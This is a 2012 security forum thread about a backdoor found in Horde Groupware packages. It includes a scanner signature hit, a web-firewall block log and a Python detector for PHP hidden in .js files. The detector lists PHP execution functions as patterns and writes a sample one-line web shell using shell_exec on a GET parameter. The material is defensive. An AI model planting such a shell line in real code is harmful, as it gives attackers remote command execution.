Atomic Secure Linux
 Post subject: Horde Groupware contains backdoor
Unread postPosted: Fri Feb 17, 2012 3:27 pm 
Forum Regular

Joined: Sat Mar 28, 2009 6:58 pm
Posts: 865
Location: Germany
Even though Plesk comes with another one, it's still urgent. If someone did a manual install of Horde between November 2011 and 7 February, they should act immediately.

######################
Unknown perpetrators infiltrated a backdoor into several installation packages during an attack on groupware provider Horde's FTP server. Horde 3.3.12, Groupware 1.2.10 and the webmail edition of the groupware product are all affected. Horde 4 was not modified. The CVS and Git servers are also unaffected.

Users who have installed a hacked version onto a server have thrown their systems wide open to the hackers – the backdoor enables them to execute arbitrary PHP code. By exploiting additional vulnerabilities, attackers could use this to gain complete control of the server.

According to Horde, the intrusion occurred in early November last year, but was discovered just a few days ago. The developers have now removed the backdoor from the installation packages available from the FTP server.

Users who installed one of the affected products between November 2011 and 7 February this year should download a new copy of the file or upgrade to the recently released Horde 3.3.13 or Groupware 1.2.11. The new versions also fix other critical vulnerabilities. Some Linux distributions could also contain vulnerable packages, although the developers do not say which distributions may be affected.
SOURCE:
http://www.h-online.com/open/news/item/ ... 33972.html


 Post subject: Re: Horde Groupware contains backdoor
Unread postPosted: Fri Feb 17, 2012 5:54 pm 
Atomicorp Staff - Site Admin

Joined: Thu Feb 07, 2008 7:49 pm
Posts: 3673
Location: Chantilly, VA
Thanks for letting everyone know. If you are running ASL you have both signatures for the backdoored Horde, plus rules to prevent it from being used:

$ clamscan open_calendar.js
open_calendar.js: Atomicorp.backdoored.horde.20120217165001.UNOFFICIAL FOUND

And here's the exploit of the backdoor being blocked:

[modsecurity] [client 127.0.0.1] [domain localhost] [403] [/20120217/20120217-1807/20120217-180744-AypwsMCoAfkAABZ6PFsAAAAE] [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "732"] [id "340095"] [rev "36"] [msg "Atomicorp.com WAF Rules: Possible PHP function in Argument - this may be an attack."] [data "shell_exec : '"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Match of "rx (/wp-login\\.php\\?vaultpress=true|/site-content/|^/admin/editform)" against "REQUEST_URI" required.

_________________
Michael Shinn
Atomicorp - Security For Everyone

Co-Author of Troubleshooting Linux Firewalls.
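The clamscan output above flags a JavaScript file (open_calendar.js) in the tampered Horde packages, and the advisory says the backdoor lets an attacker run arbitrary PHP. A static .js asset has no business containing a PHP open tag, so a quick heuristic sweep of a manually installed Horde tree is to look for `<?php` inside .js files and report any PHP execution primitives found after it. The script below is an added example written for this thread; it is not Atomicorp's ClamAV signature, not Horde's code, and the embedded PHP line in the constructed sample file is a made-up stand-in, not the real backdoor payload. It assumes the install keeps its JavaScript under a `js/` directory.

```python
"""Heuristic sweep of a Horde install tree for PHP code hidden in .js files.

Added example, not Atomicorp's signature or Horde's code. It flags any
.js file containing a PHP open tag, then names the execution primitives
that appear after that tag. Legitimate JavaScript that merely calls
RegExp.exec() or eval() is not flagged, because the PHP tag is required.
"""
import os
import re
import tempfile

# A PHP open tag inside a static JavaScript asset is the primary indicator.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)
# Secondary indicators, checked only in the part of the file after the tag.
EXEC_PRIMITIVES = re.compile(
    rb"\b(shell_exec|exec|system|passthru|popen|proc_open|eval)\s*\(",
    re.IGNORECASE,
)
B64_EVAL = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)


def suspicious_indicators(data: bytes) -> list[str]:
    """Return indicator names found in one file's contents (empty if clean)."""
    hits: list[str] = []
    tag = PHP_OPEN_TAG.search(data)
    if not tag:
        return hits
    hits.append("php-open-tag")
    php_part = data[tag.start():]
    if B64_EVAL.search(php_part):
        hits.append("eval-base64")
    if EXEC_PRIMITIVES.search(php_part):
        hits.append("exec-primitive")
    return hits


def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk root and return {relative_path: indicators} for flagged .js files."""
    findings: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".js"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                hits = suspicious_indicators(fh.read())
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


def build_sample_tree() -> str:
    """Constructed sample install: one clean .js file and one carrying PHP.

    The PHP line written here is an illustrative stand-in (hypothetical),
    not the code found in the tampered Horde packages.
    """
    root = tempfile.mkdtemp(prefix="horde-scan-")
    js_dir = os.path.join(root, "js")
    os.makedirs(js_dir)
    with open(os.path.join(js_dir, "prototype.js"), "wb") as fh:
        fh.write(b"/* legitimate library */\nvar m = /a/.exec(s);\n")
    with open(os.path.join(js_dir, "open_calendar.js"), "wb") as fh:
        fh.write(
            b"function openCalendar(id) { /* ... */ }\n"
            b"<?php if (isset($_GET['x'])) { echo shell_exec($_GET['x']); } ?>\n"
        )
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for rel, hits in sorted(scan_tree(sample_root).items()):
        print(f"{rel}: {', '.join(hits)}")
```

Run it against the real document root of a Horde 3 / Groupware 1.2 install instead of the sample tree; anything it flags deserves a diff against a freshly downloaded package or the fixed release before the host is trusted again.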

